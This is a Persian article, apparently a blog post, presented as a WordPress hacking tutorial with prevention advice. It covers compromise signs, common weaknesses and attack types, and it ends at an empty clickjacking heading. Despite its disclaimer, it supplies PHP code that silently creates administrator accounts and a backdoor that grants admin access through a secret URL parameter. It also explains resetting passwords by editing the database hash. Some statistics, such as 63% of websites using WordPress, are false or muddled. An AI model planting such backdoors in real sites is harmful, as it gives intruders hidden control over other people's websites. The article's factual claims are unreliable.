آموزش هک وردپرس و روش‌های جلوگیری از آن

وردپرس، پراستفاده‌ترین سیستم مدیریت محتوا در دنیا است. بیش از 63 درصد وبسایت‌ها با وردپرس ساخته شده‌اند؛ که همین نکته، هک وردپرس را به موضوع محبوبی بین متخصصان تست نفوذ تبدیل کرده‌است. هزاران هزار افزونه متن‌باز وردپرسی، توجه هر هکری را به این سیستم مدیریت محتوا جلب می‌کند. افزونه‌ها ممکن است حاوی کد و اسکریپت‌های مخربی باشند که به هکر اجازه تزریق بدافزار و انجام فعالیت‌های شرورانه را می‌دهد. به علاوه، هکرها از هک گوگلی WordPress نیز برای پیداکردن اطلاعات حساس و وبسایت‌های آسیب‌پذیر استفاده می‌کنند.

«آمارها نشان می‌دهند که از هر شش وبسایت وردپرسی، یک وبسایت در برابر حملات آسیب‌پذیر است. بیش از نیم میلیون وبسایت، در سال 2021 مورد تهاجم قرار گرفته‌اند. سرویس‌دهندگان معروف هاست وب، اصلی‌ترین هدف حمله مهاجمان هستند. در سال 2022، 40 درصد گزارش‌های مربوط به هک وردپرس از جانب پنج هاستینگ وب منتشر شد. 60 درصد هاست‌های وب دیگر شامل کسب و کارهای کوچک و متوسط بوده‌اند. در سال 2023، این روند با آسیب‌پذیری log4j گسترش پیدا کرده‌است.

آموزش هک وردپرس

امنیت وردپرس شما زمانی زیر سوال می‌رود که بدون اطلاعتان هک شود. اگر قالب، افزونه‌ها و سیستم مدیریت محتوای خود را به‌روز نکنید، هک وبسایت می‌تواند ماه‌ها یا سال‌ها طول بکشد. سایت وردپرسی که روی امنیت آن کار نشده، دچار آسیب‌پذیری‌های اساسی در افزونه‌هایش می‌شود که در را برای هکرها باز گذاشته تا داده‌های شما را ریکاوری کرده یا وبسایت را خراب کنند. بدین ترتیب، هکرها چهره وبسایت شما را از بین می‌برند.

دوره پیشنهادی: آموزش ساخت فروشگاه اینترنتی با چند فروشنده

نصب افزونه‌های امنیتی WordPress از نقطه آغاز اهمیت دارد تا مجبور نباشید کل سال با نفوذ مهاجمان سروکله بزنید. ما به همین دلیل راهنمای پیش رو را تهیه کردیم تا همه روش‌های هک و آسیب‌پذیری‌هایی را آموزش دهیم که موجب هک سایت وردپرسی می‌شود. همچنین، بهترین روش‌ها برای اطمینان از امنیت وردپرس را توضیح داده‌ایم.

• نکته: در این مطلب شیوه‌های هک وردپرس فقط مورد بررسی قرار خواهند گرفت و هیچ آموزشی مبنی بر هک کردن وردپرس به صورت عملی ارائه نخواهد شد.

هکرها چه کسانی هستند؟

اولین قدم در آموزش هک وردپرس، شناختن دشمنان است. تهدیدهای انجام‌گرفته علیه وبسایت شما ممکن است از سه منبع مختلف نشأت بگیرد.

روبات‌ها (bots) که در کامپیوتر ساخته شده و چندین وبسایت را برای آسیب‌رساندن هدف می‌گیرند. آن‌ها سریع، بهینه و تا جای ممکن از نقص‌های امنیتی و آسیب‌پذیری برنامه‌ها، افزونه‌ها و قالب‌ها سوءاستفاده می‌کنند. آسیب‌پذیری‌هایی که تاکنون برای توسعه‌دهندگان ناشناخته بوده‌اند و باید از طریق به‌روزرسانی‌ها و پچ‌ها برطرف شوند. حملات بات‌، تهاجمی و در نتیجه، به‌آسانی قابل شناسایی است.

بات‌نت‌ها که مشابه بات‌ها هستند، اما از طرف شبکه‌ای از کامپیوترهای تحت کنترل بدافزار راه‌اندازی می‌شوند. برخی به بات‌نت‌ها، ارتش زامبی می‌گویند که می‌توانند آسیب جدی وارد کنند؛ زیرا توانایی حمله همزمان به چندین وبسایت را دارند. در نهایت، مهلک‌ترین حملات مربوط به انسان است. انسانی عادی پشت صفحه‌نمایش نشسته و به وبسایت شما حمله می‌کند و دنبال المان‌های آسیب‌پذیر می‌گردد. شناسایی این‌گونه حملات دشوار است، زیرا انسان‌ها بسیار محتاط‌تر از بات و بات‌نت‌ها هستند.

دوره پیشنهادی:  آموزش طراحی سایت بدون کدنویسی

10 نشانه که هک‌ شدن وبسایت را تایید می‌کند

یکی از قدم‌های مهم در آموزش هک وردپرس، آشنایی با نشانه‌های هک‌شدن وبسایت است.

1. ورود ناموفق:

• راه‌حل: سعی کنید پسورد وردپرس را از طریق ایمیل بازیابی کرده یا با حساب کاربری دیگری وارد شوید.

2. اضافه‌شدن محتوای مخرب به وبسایت:

• راه‌حل: به‌دنبال محتوای مخفی‌‌شده در کدهای وبسایت بگردید. امکان دارد در فوتر، لینک‌هایی به سایت‌های مخرب داده شده‌باشد یا پنجره پاپ‌آپی نصب شده‌باشد که به‌طور منظم به مشتریان نمایش داده می‌شود. از Security Ninja برای اسکن یا نظارت مداوم سایت جهت کشف چنین مشکلاتی بهره ببرید.

3. بازدیدهای مشکوک:

• راه‌حل: از گوگل وبمستر تولز برای پیداکردن دامین‌های مشکوک استفاده کنید.

4. افت ناگهانی ترافیک:

• راه‌حل: بخش Safe Browsing Site Status از گوگل را بررسی کرده و ببینید آیا وبسایت شما Unsafe و برای بازدید‌شدن خطرناک است؟

5. نتایج موتور جستجو عجیب است:

• راه‌حل: وبسایت خود را با گوگل وبمستر تولز زیر و رو کنید.

6. نمی‌توانید ایمیل بفرستید یا دریافت کنید:

• راه‌حل: قابلیت ایمیل وردپرس را با ابزارهای رایگان بررسی کنید.

7. سایت وجود ندارد:

• راه‌حل: یکی از افزونه‌های معتبر مدیریت فایل پشتیبان‌ را برای WordPress نصب کنید.

8. فایل‌های مشکوک:

• راه‌حل: به‌دنبال فایل‌هایی باشید که متعلق به سیستم وردپرس شما نیستند. از Security Ninja برای اسکن منظم وبسایت و پیداکردن خودکار این‌گونه فایل‌ها بهره بگیرید. سپس، فایل‌ها را پاک کرده یا کد مخرب را از فایل‌های آلوده حذف کنید. استفاده از افزونه Core Scanner برای Security Ninja را فراموش نکنید.

9. اعضای جدید:

• راه‌حل: آدرس صفحه ورود را با افزونه‌ای رایگان تغییر داده، دسترسی به ورود وردپرس را با استفاده از فایل .htpasswd محدود کرده و از افزونه Login Ninja برای محافظت همیشگی از فرم ورود بهره ببرید.

10. رویدادهای زمان‌بندی‌شده در سرور:

• راه‌حل: CRON jobs را در سرور مورداستفاده بررسی کرده و مطمئن شوید هیچ تسک زمان‌بندی‌شده مشکوکی وجود ندارد.

پیشنهاد مطالعه: مزایای وردپرس و دلایل استفاده از این سیستم مدیریت محتوا

اصلی‌ترین دلایل برای هک سایت وردپرسی

اول از همه، وردپرس تنها نیست. همه وبسایت‌های اینترنتی در برابر حملات هکرها آسیب‌پذیرند. بنابراین، آموزش هک وردپرس تنها به این نرم‌افزار محدود نشده و کاربردهای دیگر نیز دارد. وبسایت‌های وردپرسی هدف رایج حملات هکری هستند، زیرا محبوب‌ترین وبسایت‌ساز در دنیا به‌شمار می‌روند. همچنین، این ادعا را می‌توان با استفاده از حجم جستجوی بالای عبارت «how to hack a wordpress site 2023» ثابت کرد. بیشتر این کاربران، هکرهای تازه‌کار و جدیدی هستند که می‌خواهند آموزش هک حرفه ای ببینند.

دوره پیشنهادی:  آموزش طراحی سایت مقدماتی

محبوبیت بالا به هکرها القا می‌کند که وبسایت‌های آسیب‌پذیر وردپرسی زیادی برای سوءاستفاده پیدا می‌شوند. هکرها انگیزه‌های متفاوتی دارند. برخی فقط به‌دنبال یادگیری بیشتر با بهره‌گیری از امنیت پایین وبسایت‌ها هستند. هکرها عموما افراد خرابکاری‌اند که بدافزارها را منتشر می‌کنند، از منابع هاستینگ وبسایت‌ها برای حمله به دیگران بهره می‌برند یا حتی اسپم به سطح اینترنت می‌فرستند.

زمانی که هکری بتواند وارد وبسایت شما بشود، می‌تواند فعالیت‌های خرابکارانه زیادی انجام دهد، مانند:

• دزدیدن داده‌های مالی از فروشگاه‌های اینترنتی ساخته‌شده با ووکامرس
• تغییر شکل وبسایت برای سرگرمی یا اخاذی
• ارسال ایمیل‌های اسپم
• آلوده‌کردن وبسایت با بدافزار، از طریق اسکریپت‌های مخرب که بارگیری نرم‌افزار خرابکار و آسیب‌زا را روی کامپیوتر کاربر تسهیل می‌کند
• استفاده از روش‌های کلاه سیاه سئو مانند تزریق لینک‌های اسپم، اسپم سئو و هک کلمات کلیدی ژاپنی.

چرا وبسایت وردپرسی شما هک می‌شود؟

بیایید نگاهی داشته باشیم به اصلی‌ترین دلایلی که وبسایت را آسیب‌پذیر کرده و باعث هک سایت وردپرسی شما می‌شود. مباحث زیر، پایه و اساس آموزش هک وردپرس به‌شمار می‌رود.

دلیل ۱: هاستینگ وب ناامن

وبسایت‌های وردپرسی مانند بقیه وبسایت‌ها روی سرور وب میزبانی می‌شوند. برخی از شرکت‌های هاستینگ از امنیت پلتفرم هاستینگ خود غافل می‌شوند. این قضیه به‌خصوص برای هاست‌های رایگان، نامحدود یا ارزان‌قیمت صادق است. با تهیه یکی از بهترین و معروف‌ترین هاست‌های موجود در بازار می‌توانید این مشکل را حل کنید.

دلیل ۲: رمز عبورهای ضعیف

رمز عبور، کلید ورود به وبسایت وردپرسی شماست. شما باید از پسورد وردپرس قدرتمند و منحصر به‌فردی برای هریک از حساب‌های کاربری خود استفاده کنید؛ زیرا هرکدام از آن‌ها می‌تواند وبسایت را تحت کنترل هکر دربیاورد.

• حساب کاربری مدیریت وردپرس
• حساب کاربری کنترل پنل هاستینگ (سی‌پنل یا دایرکت ادمین)
• حساب‌های کاربری FTP
• پایگاه داده MySQL که برای سایت وردپرسی استفاده می‌شود
• حساب‌های ایمیلی که برای مدیر وردپرس یا حساب کاربری هاستینگ استفاده می‌شود

همه این حساب‌ها نیاز به رمز عبوری امن دارند. استفاده از پسوردهای ضعیف، باعث می‌شود هکرها به‌راحتی و با استفاده از ابزارهای ابتدایی به هک پسورد شما بپردازند. برای جلوگیری از این مشکل، پسورد وردپرس قدرتمندی برای هریک از حساب‌های کاربری خود انتخاب کنید.

پیشنهاد مطالعه: ویرایشگر وردپرس چیست؟ + معرفی انواع ویرایشگرها

دلیل ۳: دسترسی محافظت‌نشده به ادمین وردپرس

بخش ادمین وردپرس، به کاربر اجازه می‌دهد تا کارهای زیادی در وبسایت انجام دهد. همچنین، بیشترین حملات نیز به همین بخش از وبسایت صورت می‌گیرد. محافظت‌نکردن از این بخش مهم، باعث می‌شود هکرها با استفاده از روش‌های مختلف اقدام به شکست قفل وبسایت کنند. با اضافه‌کردن چندین لایه اعتبارسنجی به دایرکتوری ادمین وردپرس می‌توانید کار آن‌ها را سخت کنید.

اول از همه، پسورد وردپرس را برای بخش ادمین، بسیار قدرتمند برگزینید؛ زیرا هک پسورد ادمین وردپرس بسیار رایج است. با این کار، لایه جدیدی به امنیت وردپرس اضافه می‌شود که جلوی دسترسی دیگران به این بخش را می‌گیرد. اگر وبسایت شما چندین ادمین دارد، باید پسورد قدرتمندی برای هریک از حساب‌های کاربری انتخاب کنید. همچنین، می‌توانید اعتبارسنجی دومرحله‌ای را نیز برای بخش ادمین وبسایت فعال کرده تا دست و پای هکر بیش از پیش بسته شود.

دوره پیشنهادی: آموزش جامع طراحی سایت با وردپرس

دلیل ۴: مجوزهای نادرست فایل

مجوزهای فایل به مجموعه‌ای از قوانین گفته می‌شود که وب سرور از آن استفاده می‌کند. این مجوزها به وب سرور اجازه کنترل دسترسی به فایل‌ها را می‌دهد. مجوزهای نادرست فایل و فولدر می‌تواند به هکر دسترسی نوشتن و اصلاح فایل‌ها را بدهد. همه فایل‌های وردپرس باید مقدار 644 و همه فولدرها در سایت وردپرسی باید محوز 755 را به عنوان فایل داشته باشند.

دلیل ۵: به‌روزنکردن وردپرس

برخی از کاربران وردپرس دکمه به‌روزرسانی وردپرس را نمی‌زنند، زیرا می‌ترسند که وبسایتشان دچار افت شود. هر نسخه جدید از وردپرس، خطاها و آسیب‌پذیری‌های امنیتی را رفع می‌کند. اگر وردپرس را به‌روز نکنید، خودخواسته باعث آسیب‌پذیرماندن سایت شده‌اید. اگر نگران هستید که وبسایتتان پس از به‌روزرسانی دچار اشکال شود، ابتدا نسخه کامل پشتیبان از آن بگیرید. در این‌صورت، اگر چیزی به‌هم ریخت، به‌راحتی می‌توانید نسخه قدیمی‌تر را برگردانید.

دلیل ۶: افزونه و قالب‌های پچ‌نشده

امنیت افزونه و قالب‌های وردپرس نیز مانند نرم‌افزار وردپرس اهمیت دارد. استفاده‌کردن از افزونه یا قالب تاریخ‌گذشته می‌تواند آسیب‌پذیری وبسایت را بالا ببرد. رخنه‌ها و خطاهای امنیتی اغلب در افزونه و قالب‌های وردپرسی یافت می‌شود. سازندگان افزونه و قالب‌ها معمولا خطاها را به‌سرعت برطرف می‌کنند. با این‌حال، اگر کاربر نخواهد افزونه و قالب را به‌روز کند، دیگر کاری از دست سازندگان برنمی‌آید. همیشه حواستان باشد که قالب‌ها و افزونه‌ها را به‌روز نگه دارید. همچنین، در صورت نصب قالب‌های نال‌شده، حتما اسکن امنیتی کامل روی آن اجرا کنید.

دلیل ۷: استفاده از FTP به‌جای SFTP/SSH

حساب کاربری FTP برای بارگذاری فایل‌ها در سرور وب شما با استفاده از کلاینت FTP کاربرد دارد. اکثر هاست‌های وب با استفاده از پروتکل‌های مختلف، اتصال FTP را پشتیبانی می‌کنند. شما می‌توانید از طریق FTP، SFTP یا SSH متصل شوید. وقتی از FTP برای اتصال به وبسایت استفاده کنید، رمز عبور بدون هیچ رمزنگاری خاصی به سرور ارسال می‌شود. هکرها می‌توانند در کمین باشند و به‌راحتی آن را بدزدند. همیشه باید از SFTP یا SSH به‌جای FTP بهره بگیرید.

لازم نیست کلاینت FTP خود را تغییر دهید. اکثر کلاینت‌های FTP می‌توانند به SFTP و SSH نیز متصل شوند. فقط باید هنگام اتصال به وبسایت، پروتکل را به SFTP – SSH تغییر دهید. از فایل منیجر (مدیریت فایل) سی‌پنل نیز غافل نشوید. ابزار قدرتمند فایل منیجر قابلیت فشرده‌سازی / رفع فشرده‌سازی مخصوصی را در اختیار قرار می‌دهد که امنیت فایل‌های سرور را بیشتر می‌کند.

دلیل ۸: استفاده از نام کاربری admin در وردپرس

استفاده‌کردن از کلمه admin برای نام کاربری وردپرس توصیه نمی‌شود. اگر نام کاربری مدیریت وبسایت، admin است، به‌سرعت آن را تغییر دهید.

دلیل۹: قالب‌ها و افزونه‌های منسوخ‌شده

بسیاری از وبسایت‌های اینترنتی، افزونه و قالب‌های پولی وردپرس را به رایگان منتشر می‌کنند. گاهی اوقات، کاربر وسوسه می‌شود تا از این‌گونه قالب‌ها و افزونه‌ها در وبسایت خود نصب کند. دانلود‌کردن قالب‌ها و افزونه‌های وردپرسی از منابع نامطمئن بسیار خطرناک است. این فایل‌ها نه‌تنها امنیت وردپرس را به خطر می‌اندازند، بلکه برای دزدیدن اطلاعات حساس هم استفاده می‌شوند.

شما همیشه می‌توانید قالب و افزونه را از وبسایت سازنده یا مخازن مطمئن نرم‌افزار وردپرس دانلود کنید. اگر توانایی مالی یا تمایل به خرید قالب‌ها و افزونه‌های پولی ندارید، همیشه جایگزین‌های رایگانی وجود دارد که همان کار را انجام می‌دهند. افزونه‌های رایگان شاید به اندازه همتای پولی خود عملکرد فوق‌العاده‌ای نداشته باشند، اما کار خود را انجام می‌دهند و از همه مهم‌تر، امنیت وبسایت را به‌ خطر نمی‌اندازند.

دلیل ۱۰: امن‌نبودن یا هک‌ شدن فایل wp-config.php

فایل پیکربندی wp-config.php در وردپرس، دارای اطلاعاتی برای اتصال پایگاه داده مخصوص به وردپرس است. در صورتی‌که این فایل به خطر بیفتد، اطلاعاتی نشر پیدا می‌کند که دسترسی کامل وبسایت را به هکرها می‌دهد. بیشترین حملات سایبری به فایل wp-content.php و سپس به فایل wp-config.php انجام می‌شود.

شما با جلوگیری از دسترسی به فایل wp-config.php با استفاده از .htaccess، لایه امنیتی جدیدی را به وبسایت خود اضافه می‌کنید و مانع هک وردپرس از طریق فایل wp-config.php می‌شوید. کافیست کد کوتاه زیر را در فایل .htaccess قرار دهید:

<files wp-config.php>

Order allow,deny

Deny from all

</files>

دلیل ۱۱: تغییرندادن پیشوند جداول در وردپرس

بسیاری از متخصصان توصیه می‌کنند که پیشوند پیشفرض table در وردپرس را تغییر دهید. وردپرس از پیشوند wp_ برای جداول ساخته‌شده در پایگاه داده استفاده می‌کند. شما در طول فرآیند نصب، امکان تغییر آن را دارید. پیشنهاد می‌شود تا از پیشوند پیچیده‌تری استفاده کنید. بدین ترتیب، هکرها برای حدس‌زدن نام جداول دیتابیس، کار دشوارتری دارند.

چگونه وبسایت وردپرسی را هک کنیم؟ (آموزش هک وردپرس)

بسیاری از کاربران، مقاله آموزش هک وردپرس را می‌خوانند تا به این بخش برسند. حمله خرابکارانه، بسته به هدف خود، راه را برای هک‌کردن وبسایت وردپرسی از طریق روش‌های مختلف ممکن می‌کند. حملات و روش‌های پرتکرار که صاحبان وبسایت‌های وردپرسی را نگران کرده‌است.

۱. ایجاد کاربران جدید از طریق FTP

هکرها وقتی که به HTTP دسترسی نداشته باشند، سعی می‌کنند تا به سرور FTP دسترسی یابند و امتیازات مدیریتی جدیدی بسازند. هکرها برای ساخت حساب کاربری خارج از محیط وردپرس، فقط به دسترسی FTP نیاز دارند. هکری که امتیاز مدیریتی داشته باشد، همه اطلاعات لازم برای اتصال به سرور و در نتیجه، ساخت حساب کاربری جدید را از طریق ایجاد فانکشن جدید در قالب وبسایت خواهد داشت.

پیشنهاد مطالعه: ورود امن وردپرس و راه کارهای آن

۲. تغییر functions.php در آموزش هک وردپرس

به دو طریق می‌توان این فایل را تغییر داد؛ اول با استفاده از سی‌پنل و دوم کلاینت FTP. هکرها با استفاده از سی‌پنل، فایل منیجر را باز کرده و محل قالب فعال را پیدا می‌کنند. هکر کافیست به public_html / wp_content / themes برود و قالب را پیدا کند. حالا فقط بازکردن فایل قالب و ویرایش functions.php باقی مانده‌است. کد باید قبل از بسته‌شدن تگ اضافه شده تا هک انجام شود! یادتان نرود که رمز عبور را نیز تغییر دهید. هکرها زمانی که حساب کاربری جدید را بسازند، کد را از فایل functions.php حذف می‌کنند.

٣. استفاده از سی‌پنل / MySQL

از این روش برای تغییر رمز عبور یا نام کاربری مربوط به حساب کاربری موجود یا ایجاد حساب کاربری جدید استفاده کنید. شما به دسترسی سی‌پنل یا دسترسی مستقیم MySQL به پایگاه داده وبسایت نیاز دارید. بیایید با تغییر پسورد وردپرس حساب کاربری موجود شروع کنیم. اگر از سی‌پنل استفاده می‌کنید، وارد شوید (سی‌پنل همیشه از طریق لینک https://yoursite.com:2083 باز می‌شود)، phpMyAdmin را پیدا کرده و باز کنید. فهرست پایگاه‌های داده و جداول در سمت چپ قرار دارد. شما باید به‌دنبال جدولی باشید که به _users ختم می‌شود. احتمالا wp_users باشد، اما اگر چندین وبسایت وردپرسی نصب‌شده روی سرور دارید، باید گزینه مدنظر را بیابید.

گزینه مدنظر شما، دارای کاربری است که باید ویرایش کنید. اگر از طریق کلاینتی خارجی مانند online MD5 به MySQL متصل شده‌اید، همین مسیر را طی کنید. زمانی که جدول مدنظر و اطلاعات ثبت‌شده کاربر را یافتید، زمان تغییردادن رمز عبور فرا می‌رسد.

احتمالا متوجه شده باشید که رمز عبور در user_pass ذخیره و با استفاده از الگوریتم MD5 هش شده‌است. online MD5 generator را باز کرده، رمز عبور مدنظر خود را وارد کرده و روی Hash بزنید. رشته تولیدشده را کپی کرده و به‌جای رمز عبور اصلی پیست کنید. در phpMyAdmin با دوبار کلیک، می‌توان آن را ویرایش کرد. این مراحل برای کلاینت‌های دیگر MySQL نیز یکسان است. تغییرات را ذخیره کرده و با رمز عبور جدید، وارد وردپرس شوید.

٤. ایجاد حساب کاربری کاربر جدید از طریق FTP

حساب‌های کاربری FTP را عموما کاربرانی استفاده می‌کنند که می‌خواهند دایرکتوری خاصی را در سایت بسازند و اجازه دهند کاربران دیگر با نام کاربری و پسورد وردپرس خود در آن به دانلود و آپلود فایل بپردازند. تمام فایل‌های درون این بخش از سطح اینترنت مشاهده‌پذیر است. برای ساخت حساب کاربری FTP در سایت خود، روی FTP Accounts بزنید تا به کنترل پنل دسترسی داشته باشید. شما در این قسمت می‌توانید دسترسی به بخش خاصی از سایت را به منظور آپلود و دانلود فایل‌ها پیکربندی کنید:

• داده‌های خواسته‌شده را وارد کنید:
• User یا Login: نام کاربری حساب FTP جدید.
• Password: رمز عبوری که برای دسترسی از طریق FTP به این حساب اختصاص می‌دهید.
• Directory: دایرکتوری داخل سایت که از طریق FTP دردسترس است. دایرکتوری به‌طور خودکار مانند user بدون @ mydomain.com است که می‌توان آن را تغییر هم داد. این دایرکتوری اگر قبلا ایجاد نشده باشد، به‌طور خودکار ساخته می‌شود. اگر این بخش را خالی بگذارید، حساب کاربری FTP جدید می‌تواند به همه دایرکتوری‌های داخل سایت دسترسی داشته باشد. ما این کار را توصیه نمی‌کنیم. برای مثال، بهتر است فقط دسترسی به public_html را به طراح وبسایت خود بدهید تا فایل‌هایش را آپلود و دانلود کند. بدین ترتیب، دایرکتوری‌های حیاتی و حساس شما در دسترس او قرار نمی‌گیرد.
• Quota: مقدار فضای ذخیره‌سازی است که می‌خواهید به این فولدر اختصاص دهید. این فضا را می‌توان نامحدود نگه داشت یا مقدار آن را به MB تعیین کرد.
• حالا روی دکمه Create کلیک کنید تا حساب کاربری FTP ساخته شود.

کاربر جدید اکانت FTP از طریق برنامه‌ای خاص و اطلاعات زیر به وبسایت دسترسی خواهد داشت:

Address  Host Name / Adress: yourdomain.com or ftp.yourdomain.com

User / User: user@yourdomain.com

Password: El password assigned to this FTP account

توجه: در اطلاعات بالا، yourdomain.com را به آدرس دامنه خود تغییر دهید.

ایجاد حساب‌های کاربری جدید در وردپرس بسیار ساده است. شمایی که مدیر هستید، باید به بخش حساب‌های کاربری رفته و اکانت جدیدی را با نقش کاربری دلخواه بسازید. این کار در چند ثانیه انجام می‌شود و کاربر جدید با نام کاربری و رمز عبور مشخص می‌تواند وارد سایت شود.

ساخت حساب کاربری جدید از طریق FTP

مراحل ساخت حساب کاربری جدید از طریق FTP به صورت زیر است:

• کلاینت FTP را باز کرده و حساب کاربری خود را متصل کنید.
• به آدرس wp-content/themes بروید.
• پوشه مربوط به قالب مورداستفاده خود را باز کنید.
• دنبال فایل php بگردید و ویرایش کنید.
• فانکشن زیر را در فایل قرار دهید:

function admin_account(){

$user = 'Username';

$pass = 'Password';

$email = 'email@domain.com';

if ( !username_exists( $user )  && !email_exists( $email ) ) {

$user_id = wp_create_user( $user, $pass, $email );

$user = new WP_User( $user_id );

$user->set_role( 'administrator' );

} }

add_action('init','admin_account');

• نام کاربری، رمز عبور و ایمیل را به عبارتی منحصر به‌فرد تغییر دهید
• تغییرات را ذخیره کنید

روش‌ های هک‌کردن وردپرس

چندین حمله مختلف در آموزش هک وردپرس وجود دارد که هکرها برای رسیدن به اطلاعات شما استفاده می‌کنند. بهتر است در مسیر آموزش هک وردپرس، این حملات را نیز یاد بگیرید.

حملات مرد میانی

امکان دارد کاربران از حملات مرد در وسط علیه آن‌هایی استفاده کنند که LAN مشترکی دارند. تا زمانی که اعتبارنامه لاگین با تونل VPN یا کدهای دیگری مانند HTTPS رمزنگاری نشوند، اطلاعات ورود به‌صورت متنی ساده رویت‌پذیر است. نرم‌افزاری که کاربران را قادر به انجام چنین حملاتی می‌کند، می‌تواند حمله brute force به افزونه‌ها انجام دهد، قالب‌های آسیب‌پذیر را شناسایی کند یا کاربران معتبر را حدس بزند و تایید کند. توصیه می‌کنیم از ورود بدون رمز عبور وردپرس بهره ببرید تا امنیت مکانیزم ورود به وبسایت بالاتر برود.

دوره پیشنهادی:  آموزش وردپرس (WordPress)

حمله Brute force در وردپرس

بات‌ها ترکیب‌های مختلفی از نام کاربری و رمزهای عبور را امتحان می‌کنند. این روش، آسان‌ترین کار یک هکر برای دسترسی به وبسایت شما محسوب می‌شود. افزونه‌ها می‌توانند جلوی حملات brute force را بگیرند. ورود و اعتبارسنجی دو مرحله‌ای نیز خطر هک‌ شدن را کاهش می‌دهد.

حمله XSS در وردپرس

در این حمله، کدهای مخرب جاوا اسکریپت به صفحات وردپرسی شما تزریق می‌شود. آن‌ها به این شکل می‌توانند کوکی‌های ذخیره‌شده در طول نشست کاربر را دربیاورند. سپس، آن‌ها با تغییر اطلاعات خود، هویت کاربر را جعل می‌کنند. با نصب دیواره آتش (فایروال) می‌توانید از چنین حملات و بسیاری از موارد مشابه دیگر جلوگیری کنید.

حملات دستور SQL

هدف این‌گونه حملات، کاهش عملکرد سایت، دزدیدن، حذف‌کردن یا حتی خراب‌کردن داده‌ها است. دستورها به فیلدهای ورودی سایت تزریق می‌شوند (مثلا صفحه اعتبارسنجی). فایروالی مناسب و بررسی سلامتی (برای پاکسازی دائمی داده‌های حساس) خیال شما را از بابت این حملات راحت می‌کند.

تزریق درب پشتی (Backdoor)

هکرها وقتی درب جلویی را بسته ببینند، شانس خود را از درب عقب (backdoor) امتحان می‌کنند. این تهاجم مانند روشی خرابکارانه برای استفاده از کد جهت دسترسی و کنترل سایت به‌نظر می‌رسد، اما گاهی اوقات حتی مالکان وبسایت نیز از این تکنیک برای کنترل وبسایت خود استفاده می‌کنند. مواردی وجود دارد که درب جلویی برای هکرها باز نمی‌شود تا به سایت دسترسی یابند، اما درب عقبی آسیب‌پذیر است و هکرها به آن هجوم می‌آورند تا دسترسی مستقیم پیدا کنند.

عمده این اتفاقات زمانی می‌افتد که کدهایی مخفی در محیط وردپرس وجود دارد و هکرها با نقش مدیریت به سایت دسترسی پیدا می‌کنند. شما می‌توانید این کدها را پاک کرده و نسخه پشتیبان را بارها و بارها بازیابی کنید، اما اغلب اوقات مدیر وبسایت خبری از این حمله ندارد.

ایجاد درب پشتی (Backdoor) در وردپرس

بسیار خب، صحبت کافیست، قطعه کد زیر همان چیزی است که شما نیاز دارید:

1. فایل php را باز کنید
2. کد زیر را در آن قرار دهید:

add_action('wp_head', 'wploop_backdoor');

function wploop_backdoor() {

If ($_GET['backdoor'] == 'how to hack wordpress') {

require('wp-includes/registration.php');

If (!username_exists('username')) {

$user_id = wp_create_user('name', 'pass');

$user = new WP_User($user_id);

$user->set_role('administrator');

}

}

}

?>

3. تغییرات را ذخیره کنید

اگر کد بالا را به همان شکل در فایل فانکشن‌ها قرار دهید، با رفتن به آدرس http://www.yourdomain.com/?backdoor=how to hack wordpress می‌توانید ادمین جدیدی برای سایت تعریف کنید.

کاراکترهای ژاپنی در سایت وردپرسی

در هک کلمه کلیدی ژاپنی، متن‌های ژاپنی که خودکار تولید شده، در سایت شما به نمایش درمی‌آید. چنین اسپم سئوی کلاه سیاهی، نتایج گوگل را با نمایش صفحاتی آلوده‌شده به عنوان‌ها و توضیحات ژاپنی می‌رباید. این اتفاق زمانی رخ می‌دهد که برای موتور جستجو و کاربر عادی، نتایج متفاوتی نمایش داده می‌شود. نام‌های دیگر این تهاجم، «هک کلمه کلیدی ژاپنی»، «اسپم جستجوی ژاپنی» یا «اسپم سمبل ژاپنی» است.

فیشینگ

فیشینگ یکی از رایج‌ترین اصطلاحات دنیا هک است که از زبان مسئولین امنیتی می‌شنوید. در این تکنیک، کاربر را گول می‌زنند تا داده‌های حساس خود را (مانند نام کاربری، رمز عبور یا اطلاعات کارت بانکی) برای منابع به‌ظاهر بی‌ضرر فاش کند. فیشرها خود را نهادی معتبر جا می‌زنند و با قربانیان احتمالی تماس گرفته و اطلاعاتشان را درخواست می‌کنند. چنین اطلاعاتی می‌تواند برای اهداف خرابکارانه استفاده شود. برای مثال، فیشر می‌تواند شکل بانک به‌خود گرفته و اطلاعات محرمانه بانکی‌تان را از طریق ایمیل بخواهد. همچنین، می‌تواند شما را به کلیک روی لینکی مخرب ترغیب کند.

بدافزار

هرروز خبرهایی از آلوده‌شدن وبسایت‌ها به بدافزار منتشر می‌شود؛ پس ایجاب می‌کند که بیشتر درباره این اصطلاح مربوط به هک بدانیم. بدافزار، نرم‌افزاری است که هکرها برای ربودن سیستم‌های کامپیوتری یا دزدیدن اطلاعات حساس دستگاه‌ها طراحی کرده‌اند. بدافزارها نام‌های مانند ادویر، جاسوس‌افزار، کیلاگر و غیره دارند. بدافزار می‌تواند از طریق روش‌های مختلفی از جمله USB، هارد درایو یا اسپم وارد سیستم شود.

بدافزار رایجی که سال 2021 در کمین نشسته بود، بدافزار WP-VCD و بدافزار ریدایرکشن نام داشت که وبسایت شما را به سایتی اسپم ریدایرکت می‌کرد. برای مثال، بدافزار تازه‌تری هست که نسخه دسکتاپ وبسایت‌های وردپرسی، موبایل اپن‌کارت و مجنتو را به لینک‌های مخرب ریدایرکت می‌کند. نتیجه این حملات، از دست‌دادن مشتریان، اعتبار و تاثیر بد روی رتبه نتایج گوگل بود.

باج‌افزار وردپرسی

باج‌افزار یکی از اصطلاحات پرجستجوی سال 2017 بود. باج‌افزار نوعی بدافزار است که دسترسی فرد به سیستم خود را مسدود کرده و اجازه دستیابی به فایل‌هایش را نمی‌دهد. سپس، پیامی به‌نمایش درمی‌آید که مقدار و مکان جابه‌جایی پول را عمدتا به بیت‌کوین مشخص کرده تا فایل‌ها را به کاربر برگرداند. چنین حملاتی نه فقط کاربران، بلکه بانک‌ها، بیمارستان‌ها و کسب و کارهای آنلاین را نیز تحت تاثیر قرار می‌دهد. تازه‌ترین حمله این شکلی، تهاجم پتیا بود که مانند طوفانی، کسب و کارها را دربر گرفت.

اسکریپتینگ بین سایتی (XSS)

 هکرهایی که از حملات XSS استفاده می‌کنند، محتوایی را به صفحات تزریق کرده که موجب خرابی مرورگر هدف می‌شود. سپس، هکر می‌تواند صفحه را به دلخواه خود تغییر داده، اطلاعات کوکی‌ها را بدزدد، سایت‌ها را برای بازیابی داده‌های حساس هایجک کند یا کدهای مخربی را تزریق کند که متعاقب آن اجرا می‌شوند.

کلیک‌جکینگ

